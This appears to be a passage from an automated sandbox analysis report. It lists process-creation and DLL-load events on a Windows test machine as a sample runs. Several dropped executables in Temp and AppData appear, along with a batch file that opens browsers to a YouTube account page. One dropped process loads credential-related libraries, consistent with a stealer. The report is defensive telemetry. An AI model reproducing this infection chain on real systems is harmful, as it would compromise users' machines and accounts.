Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3064 -parentBuildID 20230927232528 -prefsHandle 3208 -prefMapHandle 3204 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2957b26f-774e-48be-a5e4-6995945e05fa} 4512 "\\.\pipe\gecko-crash-server-pipe.4512" 189373ea410 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2424 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5280 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=3540 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6660 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6660 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7340 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=6720 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7056 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Users\user\1000003002\d27375200a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4B76.tmp\4B77.tmp\4B78.bat C:\Users\user\1000003002\d27375200a.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,9310775074731790964,8760316038364529683,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=6720 --field-trial-handle=2200,i,2508916279924330796,5575134678906347488,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe "C:\Users\user\AppData\RoamingFHJDBKJKFI.exe"
Source: C:\Users\user\AppData\RoamingFHJDBKJKFI.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\RoamingHJKECAAAFH.exe "C:\Users\user\AppData\RoamingHJKECAAAFH.exe"

Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe	Section loaded: netutils.dll
Source: C:\Users\user\1000003002\d27375200a.exe	Section loaded: winmm.dll
